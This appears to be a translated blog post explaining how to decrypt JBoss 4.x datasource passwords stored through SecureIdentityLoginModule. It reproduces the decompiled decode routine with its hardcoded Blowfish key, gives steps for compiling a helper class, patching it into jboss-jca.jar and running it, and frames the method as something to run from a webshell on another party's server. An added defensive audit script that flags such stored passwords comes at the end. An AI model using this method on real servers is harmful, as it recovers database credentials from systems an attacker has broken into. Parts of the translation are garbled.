Summary of issues with decrypting the JBoss database connection pool password

Source: Internet
Author: User
Tags jboss

I used JD-GUI and read the decryption methods of my predecessors, but I never succeeded.
In JBoss, data source passwords can be encrypted. There are many related articles. Here I will talk about how to crack them.

Taking jboss-4.0.4.GA as an example, the principle of decryption is very simple. First find the method used for encryption:

    java -cp "xxx.jar ......" org.jboss.resource.security.SecureIdentityLoginModule 13456


Okay, find the package jboss-jca.jar where SecureIdentityLoginModule is located, and in it find SecureIdentityLoginModule.class. A quick decompilation makes everything clear. Encryption uses private static String encode(String secret), so decryption is naturally private static char[] decode(String secret):

    // Decompiled excerpt of org.jboss.resource.security.SecureIdentityLoginModule
    // (class declaration and other members omitted).
    import java.math.BigInteger;
    import java.security.InvalidKeyException;
    import java.security.NoSuchAlgorithmException;
    import javax.crypto.BadPaddingException;
    import javax.crypto.Cipher;
    import javax.crypto.IllegalBlockSizeException;
    import javax.crypto.NoSuchPaddingException;
    import javax.crypto.spec.SecretKeySpec;

      private static String encode(String secret)
        throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException
      {
        // The key is a constant compiled into the class.
        byte[] kbytes = "jaas is the way".getBytes();
        SecretKeySpec key = new SecretKeySpec(kbytes, "Blowfish");
        Cipher cipher = Cipher.getInstance("Blowfish");
        cipher.init(1, key);                      // 1 == Cipher.ENCRYPT_MODE
        byte[] encoding = cipher.doFinal(secret.getBytes());
        // Signed BigInteger: the hex output may start with '-' and loses leading zero bytes.
        BigInteger n = new BigInteger(encoding);
        return n.toString(16);
      }

      private static char[] decode(String secret)
        throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException
      {
        byte[] kbytes = "jaas is the way".getBytes();
        SecretKeySpec key = new SecretKeySpec(kbytes, "Blowfish");
        BigInteger n = new BigInteger(secret, 16);
        byte[] encoding = n.toByteArray();
        Cipher cipher = Cipher.getInstance("Blowfish");
        cipher.init(2, key);                      // 2 == Cipher.DECRYPT_MODE
        byte[] decode = cipher.doFinal(encoding);
        return new String(decode).toCharArray();
      }

      public static void main(String[] args)
        throws Exception
      {
        String encode = encode(args[0]);
        System.out.println("Encoded password: " + encode);
      }
    }   // closes the class

Okay, those are the encryption and decryption parameters. The most important thing is how to execute the code in a webshell. I read the decryption code of Daniel's door and tested it online. It was not successful. I don't know if it is a castrated version.

    byte[] kbytes = "jaas is the way".getBytes();

The key point is that the previous Daniel came out in July.

Now I will talk about my stupid "2B" method. You can try it. The code on the first page of DU Niang is all biased. I sorted it out.

Create a file jboss-4.0.4.GA\server\default\lib\A.java, with this content:

    package org.jboss.resource.security;

    // What I cannot understand is the meaning of function A. Directly paste the code.
    class A {
        public static void main(String[] args) throws Exception {
            SecureIdentityLoginModule seq = new SecureIdentityLoginModule();
            // Pass the encrypted string as the first argument.
            char[] decode = seq.decode(args[0]);
            System.out.println("Haha, DEcoded password:" + new String(decode));
        }
    }


Create another file, SecureIdentityLoginModule.java:

    package org.jboss.resource.security;

    // Stub with the same package and class name as the real class in jboss-jca.jar.
    class SecureIdentityLoginModule {
        static String encode(String s) {
            return s;
        }

        static char[] decode(String s) {
            return new char[100];
        }
    }

This SecureIdentityLoginModule can be compiled separately. Then put the compiled SecureIdentityLoginModule.class into \jboss-4.0.4.GA\server\default\lib\org\jboss\resource\security

Last step: add the compiled A.class to the jboss-jca.jar package (back up before doing something bad).


Call method:

    java -cp "D:\jboss-4.0.4.GA\lib\jboss-jmx.jar;D:\jboss-4.0.4.GA\lib\jboss-common.jar;D:\jboss-4.0.4.GA\server\default\lib\jboss-jca.jar;D:\jboss-4.0.4.GA\server\default\lib\jbosssx.jar;D:\jboss-4.0.4.GA\server\default\lib\jboss-jca.jar" org.jboss.resource.security.A <encrypted string>

On Linux, change D: directly to /home, as in /home/jboss-4.0.4.GA\lib\jboss-jmx.jar, and so on. I will package these four files directly to a local directory. Assume that a Java environment is available. They are all common.
I didn't use the directly compiled file to leave this post. I can also help you with it if you need it.
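
Because the key in encode()/decode() above is a constant, any password stored through SecureIdentityLoginModule is reversible by anyone who can read the configuration file. The following audit script is an added example, not part of the original post: it flags such entries in a login-config.xml-style file. The sample XML and all its values are constructed, and the ConfiguredIdentityLoginModule plaintext case is included for contrast.

```python
import re
import xml.etree.ElementTree as ET

PKG = "org.jboss.resource.security."
# Constructed sample in the JBoss login-config.xml layout; all values are made up.
SAMPLE = f"""<policy>
  <application-policy name="EncryptedDS"><authentication>
    <login-module code="{PKG}SecureIdentityLoginModule" flag="required">
      <module-option name="username">app</module-option>
      <module-option name="password">-1f2e3d4c5b6a7988</module-option>
    </login-module>
  </authentication></application-policy>
  <application-policy name="PlainDS"><authentication>
    <login-module code="{PKG}ConfiguredIdentityLoginModule" flag="required">
      <module-option name="userName">app</module-option>
      <module-option name="password">changeme</module-option>
    </login-module>
  </authentication></application-policy>
  <application-policy name="web"><authentication>
    <login-module code="org.jboss.security.auth.spi.UsersRolesLoginModule" flag="required"/>
  </authentication></application-policy>
</policy>"""

def audit(xml_text):
    """Return [(policy name, finding)] for each stored datasource password."""
    findings = []
    for policy in ET.fromstring(xml_text).iter("application-policy"):
        for mod in policy.iter("login-module"):
            opts = {o.get("name"): (o.text or "").strip()
                    for o in mod.iter("module-option")}
            if "password" not in opts:
                continue  # module stores no password in this file
            code = mod.get("code", "")
            if code == PKG + "SecureIdentityLoginModule":
                # encode() prints BigInteger.toString(16): hex digits, with a
                # leading '-' when the first ciphertext byte has its high bit set.
                ok = re.fullmatch(r"-?[0-9a-f]+", opts["password"])
                findings.append((policy.get("name"),
                                 "static-key" if ok else "not-encoded"))
            elif code == PKG + "ConfiguredIdentityLoginModule":
                findings.append((policy.get("name"), "plaintext"))
    return findings

if __name__ == "__main__":
    for name, kind in audit(SAMPLE):
        print(f"{name}: password is {kind}, recoverable by anyone who can read the file")
```

Treat every hit as a stored plaintext password: restrict read access to the file and rotate the credential if the file has been exposed.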
